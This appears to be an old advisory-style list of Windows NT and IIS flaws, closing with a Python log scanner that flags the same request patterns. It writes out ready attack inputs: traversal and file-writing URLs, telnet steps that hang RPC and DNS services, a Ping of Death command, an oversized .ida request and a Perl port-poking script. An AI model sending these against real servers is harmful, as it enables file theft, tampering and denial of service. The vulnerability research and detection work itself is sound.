Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------

Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual processor time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test the ports on your own system (Perl is available from the NT Resource Kit):

/*begin poke code*/
use Socket;
use FileHandle;
require "chat2.pl";        # chat2.pl ships with the Perl distribution of the time

$systemname = $ARGV[0] && shift;   # host name given on the command line
$verbose = 1;                      # tell me what you're hitting
$knownports = 1;                   # don't hit known problem ports (53, 135, 1031)

for ($port = 0; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;               # nothing listening, or connection refused
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
/*end poke code*/
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0

Using a telnet application to connect to a webserver on HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending in "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other is that the server terminates with an "Access Violation" message (effectively causing a denial of service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response gives them further knowledge of how the web site is organized and of the directory structure of the server.
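Every web-server item in this post is visible in the request path alone: the '..\..' traversal, the '>PATH\target.bat' redirection with or without the %0A%0D line break, the 'GET ../..' crash, and the oversized or non-existent '.ida'/'.idq' request. The Python below is an added example, not part of the original post or of any Microsoft tool: it percent-decodes and normalizes request paths from a few constructed IIS-style log lines (backslashes treated as separators, NTFS trailing-dot trimming) and labels each pattern, so the same rules can be run over a real log. The log format, the 1024-byte length threshold, the addresses and the paths are all assumptions.

```python
"""Label the request-path patterns described in the post in access-log lines.
Added example; all sample data is constructed."""
import re
from urllib.parse import unquote

# Assumption: a request path longer than this is abnormal. It catches the
# "25kb of '.'" .ida request without matching ordinary long query strings.
MAX_PATH_LEN = 1024

# CR/LF (the %0A%0D trick) and shell redirection operators have no business
# in a request path; '>' is what turns a script request into a file write.
FORBIDDEN_CHARS = re.compile(r"[\r\n<>|]")

# NCSA-style request field, e.g. "GET /path HTTP/1.0" (constructed format).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_path(raw):
    """Percent-decode until stable (defeats double encoding) and treat
    backslashes as separators, which is how IIS on NT interprets them."""
    decoded = raw
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")


def normalize_segment(seg):
    """NTFS drops trailing dots and spaces ('scripts..' opens 'scripts');
    the '.' and '..' pseudo-entries are kept as they are."""
    if seg in (".", ".."):
        return seg
    return seg.rstrip(". ")


def escapes_root(path):
    """True if the '..' segments ever take the path above the content root."""
    depth = 0
    for seg in path.split("/"):
        seg = normalize_segment(seg)
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def analyze_request(raw_path):
    """Return the list of labels for one request path (empty when clean)."""
    findings = []
    path = decode_path(raw_path)
    segments = path.split("/")
    if any(seg == ".." for seg in segments):
        findings.append("dotdot")          # no legitimate client sends '..'
    if escapes_root(path):
        findings.append("root_escape")     # the '..\..' and 'GET ../..' cases
    if FORBIDDEN_CHARS.search(path):
        findings.append("redirect_or_crlf")
    base = path.split("?", 1)[0].lower()
    if base.endswith((".ida", ".idq")):
        findings.append("ida_idq_request")  # path-disclosure / crash request
    if len(raw_path) > MAX_PATH_LEN:
        findings.append("oversized_path")
    return findings


def scan_log(lines):
    """Map every log line whose request is flagged to its list of labels."""
    results = {}
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        found = analyze_request(m.group("path"))
        if found:
            results[line] = found
    return results


# Constructed log lines: one clean request followed by the post's patterns.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/1998:10:00:00 +0000] "GET /index.htm HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/1998:10:00:01 +0000] "GET /..\\.. HTTP/1.0" 200 1024',
    '192.0.2.11 - - [01/Jan/1998:10:00:02 +0000] "GET /scripts..\\..\\scriptname HTTP/1.0" 200 80',
    '192.0.2.12 - - [01/Jan/1998:10:00:03 +0000] "GET /scripts/exploit.bat>PATH\\target.bat HTTP/1.0" 200 0',
    '192.0.2.12 - - [01/Jan/1998:10:00:04 +0000] "GET /scripts/script_name%0A%0D>PATH\\target.bat HTTP/1.0" 200 0',
    '192.0.2.13 - - [01/Jan/1998:10:00:05 +0000] "GET /anything.ida HTTP/1.0" 404 300',
]

if __name__ == "__main__":
    for line, labels in scan_log(SAMPLE_LOG).items():
        print(", ".join(labels), "<-", line)
```

The root-escape check is deliberately separate from the plain '..' check: a path such as /scripts..\..\scriptname never leaves the content root after NTFS trimming, yet it still carries a '..' segment, and on a production server either label is worth an alert.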